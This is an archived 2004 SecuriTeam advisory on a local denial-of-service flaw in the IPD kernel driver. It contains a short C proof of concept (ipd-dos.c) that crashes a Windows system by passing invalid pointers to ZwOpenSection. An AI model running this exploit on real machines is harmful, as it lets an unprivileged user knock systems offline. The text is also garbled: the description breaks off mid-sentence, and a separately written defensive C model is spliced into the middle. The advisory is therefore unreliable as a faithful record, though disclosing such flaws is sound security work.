[NT] IPD Local System Denial of Service

From: SecuriTeam (support_at_securiteam.com)
Date: 08/18/04

    To: list@securiteam.com
    Date: 18 Aug 2004 14:28:40 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      IPD Local System Denial of Service
    ------------------------------------------------------------------------

    SUMMARY

    The <http://www.pedestalsoftware.com/> IPD (Integrity protection driver)
    is "an Open Source device driver designed to prohibit the installation of
    new services and drivers and to protect existing driver from tampering. It
    installs on Windows NT and Windows 2000 computers".

    In its security approach IPD hooks some kernel mode functions and filters
    them allowing or not their original purposes based on IPD's security
    policy.

    IPD suffers from unvalidated pointer dereferences in some of these kernel
    hooks.

    DETAILS

    Vulnerable Systems:
     * IPD versions up to 1.4

    Technical description:
    The IPD (Integrity protection driver) is an Open Source device driver
    designed to prohibit the installation of new services and drivers and to
    protect existing drivers from tampering. It installs on Windows NT and
    Windows 2000 computers.

    In its security approach IPD hooks some kernel mode functions and filters
    them allowing or not their original purposes based on IPD's security
    policy.

    IPD suffers from unvalidated pointer dereferences in some of these kernel
    hooks. For example, IPD hooks ZwOpenSection, declared as follows:

            NTSTATUS ZwOpenSection(HANDLE Handle, DWORD mask, DWORD oa);

    The problem exists because IPD does not check whether the "oa" pointer is
    valid before dereferencing it. Any local, unprivileged user can crash the.
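    As a defensive illustration added here (it is neither IPD's code nor the Windows kernel's), the following portable C model shows the entry check a hook on ZwOpenSection owes the "oa" pointer before touching it. The constants, struct and function names are assumptions modelled on the NT kernel's MmUserProbeAddress, OBJECT_ATTRIBUTES, ExGetPreviousMode and ProbeForRead.

```c
#include <stdint.h>
#include <stddef.h>

/* Constructed for this example, not IPD or Windows code: a portable model of
 * the validation a kernel hook owes a pointer handed to it from user mode.
 * On a real NT kernel the pieces are ExGetPreviousMode(), ProbeForRead()
 * inside __try/__except, MmUserProbeAddress and OBJECT_ATTRIBUTES. */
#define USER_PROBE_ADDRESS 0x7FFF0000u   /* user-space ceiling, 32-bit NT */
#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u

typedef enum { KernelMode = 0, UserMode = 1 } PROCESSOR_MODE;

/* Layout modelled on OBJECT_ATTRIBUTES; only its size and the 4-byte
 * alignment requirement matter to the checks below. */
typedef struct {
    uint32_t  Length;
    uintptr_t RootDirectory;
    uintptr_t ObjectName;     /* PUNICODE_STRING in the real structure */
    uint32_t  Attributes;
} MODEL_OBJECT_ATTRIBUTES;

/* ProbeForRead's two rules: the start must be aligned and the whole range
 * must lie below the user ceiling without wrapping.  It does not test that
 * the pages are mapped; a zero-length probe always succeeds. */
static uint32_t probe_for_read(uintptr_t addr, size_t len, size_t align) {
    if (len == 0) return STATUS_SUCCESS;
    if (addr % align != 0) return STATUS_DATATYPE_MISALIGNMENT;
    if (addr + len < addr || addr + len > USER_PROBE_ADDRESS)
        return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* Entry filter for the hook.  The advisory's bug is going straight to the
 * policy check, and so to *oa, with whatever value the caller passed; the
 * fix is to refuse before any dereference unless the probe passes.  A
 * kernel-mode caller hands us a kernel address and must not be probed.
 * Returns STATUS_SUCCESS when the hook may go on to read *oa. */
uint32_t hook_open_section_precheck(PROCESSOR_MODE previous_mode, uintptr_t oa) {
    if (previous_mode == KernelMode)
        return STATUS_SUCCESS;
    return probe_for_read(oa, sizeof(MODEL_OBJECT_ATTRIBUTES), sizeof(uint32_t));
}
```

    The probe rejects the misaligned 0x01 used in the proof of concept and any kernel-range address, but a NULL or unmapped user address still passes it, so a real driver also performs the actual dereference inside __try/__except.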

    Recommendations:
    Since the vendor has discontinued the development and support of IPD,
    NGSEC recommends uninstalling IPD.

    Exploit:
    /*
     * ipd-dos.c
     *
     * Copyright (c) 2002-2004 By Next Generation Security S.L.
     * All rights reserved
     *
     * Compiles with: cl ipd-dos.c
     *
     * Madrid, August 2004
     */

    #include <windows.h>

    /* An invalid, misaligned pointer value handed to the hooked call. */
    #define MY_NULL 0x01

    /* ZwOpenSection is resolved at run time from ntdll.dll. It uses the
     * stdcall convention, so the pointer type must say so (WINAPI). */
    typedef DWORD (WINAPI *zwopensection_TYPE)(DWORD Handle, DWORD mask, DWORD oa);

    int main(int argc, char *argv[]) {
        HINSTANCE dll;
        zwopensection_TYPE my_ZwOpenSection;

        if ((dll = LoadLibrary("ntdll.dll")) != NULL) {
            my_ZwOpenSection = (zwopensection_TYPE)GetProcAddress(dll, "ZwOpenSection");
            if (my_ZwOpenSection != NULL) {
                /* IPD's hook dereferences "oa" without validating it. */
                my_ZwOpenSection(MY_NULL, MY_NULL, MY_NULL);
            }
        }
        return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:fjserna@ngsec.com> Fermín J.
    Serna.
    The original article can be found at:
    <http://www.ngsec.com/docs/advisories/NGSEC-2004-6.txt>

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

